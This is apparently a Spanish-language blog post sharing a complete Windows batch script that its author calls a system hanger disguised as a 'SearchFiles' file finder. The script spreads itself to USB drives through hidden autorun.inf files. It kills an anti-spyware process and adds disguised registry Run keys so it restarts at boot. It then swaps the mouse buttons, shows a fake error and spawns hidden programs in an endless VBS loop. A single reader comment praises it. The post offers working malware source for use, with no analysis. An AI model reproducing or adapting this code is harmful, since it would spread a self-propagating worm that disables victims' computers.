::Simula ser un Buscador de archivos, se propaga por USB y cada que el usuario reinicie el sistema le volverá a pasar lo mismo que cuando lo ejecuto.
::::::::::::::::::::::::::::::::::
: :
: :
: Cuelga Sistema by Soldier :
: :
: :
::::::::::::::::::::::::::::::::::
@echo off
color 0E
title -SearchFiles-
set o=echo
set s=.vbs
set l=.bat
set i=.soldier
set r=%random%
set d=%random%
set e=%random%
set led=LVComServer
set spy=Anti-Spyware
echo.
echo.
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º º
echo º SearchFiles / Buscador de Archivos º
echo º º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo Espere, el programa iniciara automaticamente...
ping -n 3 localhost > nul
echo Enlistando controladores de busqueda...
ping -n 2 localhost > nul
FOR %%U IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
copy "%homedrive%\%spy%\autorun.inf" "%%U:\autorun.inf" >nul
copy /y %0 "%%U:\Searchfiles%l%" >nul
attrib +h +s "%%U:\Searchfiles%l%" >nul
attrib +h +s "%%U:\autorun.inf" >nul )
cls
if exist "%homedrive%\%spy%" (goto cont) else (goto create)
:create
md %homedrive%\%spy%
:cont
call :core
call :core2
call :core3
call :core4
call :reg
call :msj
:reg
taskkill /F /IM TeaTimer.exe
cls
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "%led%"
/t REG_SZ /d "%homedrive%\%spy%\%led%%s%" /f >nul
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "BDUpdateCheck"
/t REG_SZ /d "%homedrive%\%spy%\%led%%s%" /f >nul
goto :EOF
:core
%o% rundll32 user32.dll,SwapMouseButton >> "%homedrive%\%spy%\tmp%d%%l%"
%o% start http://img211.imageshack.us/img211/3792/army31280rc7.jpg
>> "%homedrive%\%spy%\tmp%d%%l%"
%o% start %homedrive%\%spy%\%led%%s% >> "%homedrive%\%spy%\tmp%d%%l%"
%o% Do >> "%homedrive%\%spy%\%led%%s%"
%o% Set fh = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "notepad.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "mspaint.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "calc.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "explorer.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% Loop >> "%homedrive%\%spy%\%led%%s%"
goto :EOF
:core2
%o% MsgBox "La instrucción en ""0x019816d3"" hace referencia a la memoria
en ""0x019816d3"". La memoria no se puede ""read"".",21,
"SearchFiles.exe - Error de aplicación" >> "%homedrive%\%spy%\tmp%e%%s%"
%o% Set sg = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\tmp%e%%s%"
%o% sg.run "%homedrive%\%spy%\tmp%r%%s%" >> "%homedrive%\%spy%\tmp%e%%s%"
goto :EOF
:core3
%o% Set cmd = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\tmp%r%%s%"
%o% Set shell = CreateObject("Scripting.FileSystemObject")
>> "%homedrive%\%spy%\tmp%r%%s%"
%o% cmd.Run "%homedrive%\%spy%\tmp%d%%l%" >> "%homedrive%\%spy%\tmp%r%%s%"
goto :EOF
:core4
%o% [autorun] >> "%homedrive%\%spy%\autorun.inf"
%o% open=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% icon=%systemroot%\system32\shell32.dll,7 >> "%homedrive%\%spy%\autorun.inf"
%o% UseAutoPlay=1 >> "%homedrive%\%spy%\autorun.inf"
%o% action=Abrir memoria para ver archivos >> "%homedrive%\%spy%\autorun.inf"
%o% action= @SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open=Abrir >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open\command=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open\default=1 >> "%homedrive%\%spy%\autorun.inf"
%o% shell\explore=Explorar >> "%homedrive%\%spy%\autorun.inf"
%o% shell\explore\command=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
goto :EOF
:msj
call %homedrive%\%spy%\tmp%e%%s% && exit
Descarga | Código en archivo de texto
1 comentarios:
Muy buen code amigo soldier, recuerdo esos viejos tiempos xD, incluso recuerdo ese duelo de batch en el que participaste :), nos vemos amigo ;)
salu2
Publicar un comentario
Si no tienes pagina web, elige la opción de Nombre/URL y escribe tu NOMBRE dejando el espacio de URL en blanco: